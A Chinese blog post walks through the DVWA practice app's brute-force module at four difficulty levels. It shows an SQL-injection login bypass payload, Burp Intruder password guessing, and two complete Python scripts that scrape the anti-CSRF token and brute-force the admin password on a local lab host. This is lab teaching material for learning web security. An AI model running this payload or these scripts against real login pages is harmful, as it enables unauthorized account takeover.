DVWA笔记(1)--Burte Force(暴力破解)

最新推荐文章于 2023-05-20 22:06:03 发布
最新推荐文章于 2023-05-20 22:06:03 发布
阅读量818 收藏
点赞数 2
分类专栏: dvwa系列 文章标签: dvwa 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaopan233/article/details/86762886
版权

Brute Force

暴力破解。。。。没什么好说的,就是硬生生的破解下来。。。

LOW级别

页面

看起来是一个登陆界面。就用最传统的or 1=1实验一下(毕竟最低级别嘛)

解释一下or 1 = 1的原理吧:

登陆的语句,其实就是查找数据库中有没有这条数据存在。一般的sql语句如下:

select * from user where username = ‘xxx’ and password = ‘xxx’

当xxx变为用户输入的数据时。可以构造别有用心的数据。绕过这个语句。要绕过这个语句,就要使username和password不生效。所以可以使用注释符,将语句注释掉,就可以进行绕过了。

可以再username那里的数据变为 ‘ or 1 = 1 #

到sql语句中执行就变成了

select * from user where username = ‘’ or 1 = 1 #’ and password = ‘xxx’

因为#的存在,所以后面的语句都不执行,所以可以不提交password或者乱打

 

然鹅并不可以

。。。莫非low级别都转义了特殊符号嘛?还是看看源码吧。。。

可以看到。第15行判断结果的时候。他还判断了rows是否为1。难道说username为空的行不止1行吗?我们输出一下看看。加入一个var_dump(mysqli_num_rows($result));

可以看到输出了5.说明其实是我们已经绕过成功的,但是因为记录数不为1,所以被阻挡住了。

要绕过这个阻挡很简单。让返回的行数为1即可

mysql中使用limit来设置返回的记录数,这个通常用于分页的使用

成功绕过

 

Medium级别

我们使用之前的 or 1 = 1已经行不通了

我们来看看源码

这个__mysqli_ston的全局变量其实就是它连接数据库的句柄。其实就是mysqli_connect。这个具体在Mysql连接文件那里(dvwa/includes/DBMS/MySQL.php)。不用理会。

最重要的函数是mysqli_real_escape_string()。他的作用是把字符串进行转义。但是他只转移了如下字符串:

\x00

\n

\r

\

\x1a

我们打印一下。var_dump($query)可以看到’确实被转义了

最重要的引号被转义了,所以我们也无法通过low级别的小技巧来注入登陆了。只能老老实实brute。这个主题就是暴力破解,所以就老实用吧==

开启kali。我们用brupsuite。把firefox的代理设置为burp的端口。如下:我这里是8080

 

接着就可以用浏览器访问网页了。我们输入用户名密码。就可以在burp中获取劫到的包。

快捷键ctrl + i把包转到intruder中去。intruder是一个攻击模块。

转到intruder中的Positions。这里特殊符号(看起来好像是$)之间的就是要爆破的数据。我们只需要爆破密码即可,所以我们手动去掉其他的$。先点clear $,然后就只给password加上$。

接着到Pyaloads中,我们设置一下字典文件路径。点Load加载文件。因为这是测试所以我随便写了几个密码。

接着切换到Options中点击Start attack

接着看到结果集。找返回长度不一样的一般就是正确密码了。因为爆破中很多都是失败的,失败的页面长度和成功的页面长度不一样,所以只要找不和大部分一样的那个一般就是了。

这里我们看到了两个不一样的。。。就用这些密码试试吧。。试了之后,是password是对的,但123pass的长度也不一样,但它并不是正确的密码。再测试一次,文件中加多一个password。结果如下

也是最后一个长度不一样,比其他的都小,估计是因为最后一个测试,返回数据没返回完。。?

我们还是看看源码吧,发现能限制爆破的貌似只有这个sleep()了

 

high级别

先截个包看看

可以看到,多了一个user_token。每次提交都会变。所以我们就不能像上一个方法那样子爆破了。我们看看网页源码,看看是不是在前端的hidden中写了这个token

可以看到,确实是有一个hidden在页面。思路就有了:每次请求页面--->获取token值--->提交。我们可以写一个小脚本来实现。这里我用的是python。

我们还是要通过brup抓包来获取请求头。因为他是用了session的,我们要在脚本那里伪造一个session。

代码:

urllib&urllib2版:

import urllib
import urllib2

#发送数据的格式
#GET /DVWA-master/vulnerabilities/brute/?username=admin&password=123456&Login=Login&user_token=6082ecd7d6594fb983e1817f19a40be9 HTTP/1.1

#请求头,就是之间在burp里面复制的
headers = {
'Host': '192.168.1.4',

'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language': 'en-US,en;q=0.5',

'Accept-Encoding': 'gzip, deflate',

'Referer': 'http://192.168.1.4/DVWA-master/vulnerabilities/brute/',

'Cookie': 'security=high; PHPSESSID=g9bla2962qqt07t32i1v8foko3',

'Connection': 'close',

'Upgrade-Insecure-Requests': 1
}


f = open('password.txt')
line = f.readline()
while line:
        url = "http://192.168.1.4/DVWA-master/vulnerabilities/brute/"
	#get the user token。发送时要带上伪造头。不然会报token错误
	request = urllib2.Request(url,headers=headers)
	user_html = urllib2.urlopen(request)
	#print user_html.read()

	userToken = user_html.read().split("name='user_token' value='")[1]
	userToken = userToken.split("' />")[0]

	data = {
	'username': 'admin',
	'password': line.strip(),
	'Login': 'Login',
	'user_token': str(userToken)
	}

	data = urllib.urlencode(data)

	url = url + "?" + data
    #密码爆破
	res = urllib2.Request(url,headers=headers)
	response = urllib2.urlopen(res)
	print "password: " + line.strip() + "  " + str(len(response.read()))

	line = f.readline()

f.close()

requests版:

import requests

#header
#GET /DVWA-master/vulnerabilities/brute/?username=admin&password=123456&Login=Login&user_token=6082ecd7d6594fb983e1817f19a40be9 HTTP/1.1

headers = {
'Host': '192.168.1.4',

'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language': 'en-US,en;q=0.5',

'Accept-Encoding': 'gzip, deflate',

'Referer': 'http://192.168.1.4/DVWA-master/vulnerabilities/brute/',

'Cookie': 'security=high; PHPSESSID=g9bla2962qqt07t32i1v8foko3',

'Connection': 'close',

'Upgrade-Insecure-Requests': '1'
}


f = open('password.txt')
line = f.readline()
while line:
	url = "http://192.168.1.4/DVWA-master/vulnerabilities/brute/"
	#get the user token
	user_html = requests.get(url,headers=headers)

	userToken = user_html.text.split("name='user_token' value='")[1]
	userToken = userToken.split("' />")[0]
	url = url + '?username=admin&password='+line.strip()+'&Login=Login&user_token='+str(userToken)
	

	response = requests.get(url,headers=headers)

	print "password: " + line.strip() + "  " + str(len(response.text))

	line = f.readline()

f.close()

看看测试结果

 

事实证明,password就是正确答案

我们来看看源码吧

登录时调用了一个checkToken方法,我们去看看。

我们看到它判断了我们提交的token和它的token是否一致。这个就有效阻止了burp的攻击方式,但是因为它的token是在页面上的,我们可以通过脚本拿到token来提交。

impossible级别

不可能的级别。我们来看看源码吧

这里记录了登录失败的次数,如果登陆失败次数大于3就锁定了账号。这样子暴力破解就会非常缓慢,15分钟只能跑3个。所以就相当于没用了。

xiaopan233
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA系列Brute Force
crystal919的博客
03-24 274
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 brute Force "暴力破解"是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306...
DVWA使用教程(Brute Force)(一)
aweiname2008的博客
03-19 343
DVWA使用教程(Brute Force)(一) DVWA是一个用来练习Web渗透的PHP应用。共有十个模块,分别是 1.Brute Force(爆破) 2.Command Injection(命令注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.File Uplod(文件上传) 6.Insecure CAPTCHA(不安全的验证码) 7.SQL Inj(SQL注入) 8.SQL B Inj(SQL盲注) 9....
DVWA-暴力破解-对‘g0tmi1k’文章的学习笔记
qq_43266093的博客
04-18 333
DVWA-暴力破解-对‘g0tmi1k’文章的学习笔记概要事先准备(Linux命令学习)思想及相关概念解题过程HydraPatatorBurp Suite自写脚本 g0tmi1k的原文地址 博主g0tmi1k(我叫他“搞牛奶”)的这篇文章是在学习DVWA暴力破解模块时接触到的,一路看下来发现不仅仅只有关于DVWA的解题步骤,还有很多非常值得初学者学习的其他思路和方法,于是就对这篇文章深入学习一下,记下一些个人觉得非常不错的要点。该博主的其他博文也非常优秀,是一位大神! 因为我还是个小白,还有很多东西都不会,
关于 Burte Force
辉小鱼的博客
09-03 1069
有关暴力破解笔记整理及个人操作及感悟
DVWA之Brute Force(暴力破解)
谢公子的博客
10-04 1万+
目录 Low Medium High Impossible 暴力破解是指使用穷举法,举出所有的可能的结果,然后逐一验证是否正确! Low 源代码: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password ...
实验1-DVWA部署暴力破解.docx
01-05
1. 能描述暴力破解; 2. 能应用Low等级、Medium等级的暴力破解手工和自动化方法; 3. 能应用High等级的暴力破解自动化方法及Impossible等级修复方法; 4. 能用算法描述暴力破解过程(范围、动作、结果)。 1. 暴力破解...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
DVWA(Damn Vulnerable Web Application)是一个开源的安全脆弱性应用,用于教育和训练网络安全专业人员识别和防御常见的Web应用程序漏洞。SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
### DVWA-安装-漏洞测试-漏洞修复指南 #### 安装与配置 根据文档描述,为了使用DVWA(Damn Vulnerable Web Application)进行漏洞测试,首先需要安装XAMPP或WampServer作为Web服务器环境。以下是安装步骤的概述: ...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
DVWA之Brute Force
多崎巡礼的博客
07-19 1893
Brute Force Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306“撞库”事件,实质就是暴力破解攻击。 下面将对四种级别的代码进行分析。   Low 服务器端核心代码 <?php if(isset($_GET['Login'])){ //Getusername ...
DVWA —— Brute Force 暴力破解
YouTheFreedom的博客
05-20 2437
由于没有对登录页面进行相关的防暴力破解机制,如无验证码、有验证码但验证码未在服务器端校验以及无登录错误次数限制等,导致攻击者可通过暴力破解获取用户登录账户及口令,从而获取网站登录访问权限
暴力破解Burte Force
热门推荐
西电卢本伟的博客
04-05 1万+
暴力破解弱口令,pikachu靶场
DVWA靶场通关记录(暴力破解)
weixin_73557450的博客
05-14 478
每个攻击点位用不同的字典,将每个字典作笛卡尔积,也就是用每个字典互相之间生成的有序对进行爆破。:多点爆破,但是每个position使用单独的payload平行爆破,例如,position1使用payload1,同时position2使用payload2,这种方式适用于有专门字典的情况,比如用户名位就用用户名字典,密码位就用密码字典,这样爆破起来效率更高。这里有一点要注意,因为输入过滤了引号,所以无法实现注入,所以字典中带有单引号的数据的length与其他的不一样。这里用的是github上的字典。
DVWA学习之Burte Force(暴力破解)
weixin_40950781的博客
08-17 587
DVWA学习之Burte ForceBurte Force(暴力破解)Burp Suite 之 Intruder模块0x01 模块功能简介 Burte Force(暴力破解) 暴力破解所采用的方法一般都是枚举法或穷举法,所谓枚举法,简而言之就是把所有的可能性均进行一一列举,并把所有的可能的情况进行验证。若某个情况验证符合题目的所有要求,则该题目存在唯一解,也就是爆破成功;如果所有的可能情况均进行了...
暴力破解Burte Force
kkzzjx
04-09 382
形成原因:网站没有对登录接口实施防暴力破解的措施,或者实施了不合理的措施,如不安全的验证码,或者使用token防御暴力破解 测试方法:1.抓取登录数据包,观察验证元素和response响应信息,判断 2.字典优化 如果是管理后台,可以尝试管理员为admin/administrator/root结合密码字典进行爆破 用的靶机:pikachu Bp intruder模块 之前只用过sniper-_...
PiKachu之Burte Force暴力破解
angry_program的博客
02-18 771
概述 “暴力破解”是一种攻击手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我们说一个we...
DVWA搭建
per_se_veran_ce的博客
07-17 398
DVWA搭建 DVWA是干什么的? DVWA是一个学习Web漏洞的很好的工具,一个基于PHP/MYSQL环境写的一个web应用。目的在于帮助安全专业人员在法律环境中测试他们的技能和工具,更好的了解保护Web应用程序。 DVWA有十个模块: Brute Force(暴力(破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) F...
DVWA简介及搭建
weixin_47717433的博客
01-13 2048
DVWA简介与搭建 DVWA简介 Damn Vulnerable Web App (DVWA)是一个非常脆弱的PHP/MySQL Web 应用程序。它的主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助web开发人员更好地理解保护web应用程序的过程,并帮助教师/学生在教师环境中教授/学习应用程序安全。DVWA官网 DVWA包括10个安全测试模块 Bruce Force暴力破解 Command Injection-- 命令注入 CSRF-- 跨站请求伪造 File Inclusion--
DVWA与sqli-labs的区别
最新发布
04-17
1. 目的:DVWA是一个包含多种不同类型漏洞的Web应用程序,旨在帮助用户了解和学习Web应用程序的安全性。它提供了各种漏洞场景,如SQL注入、跨站脚本攻击(XSS)、文件包含等,供用户进行渗透测试和漏洞利用的实践。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值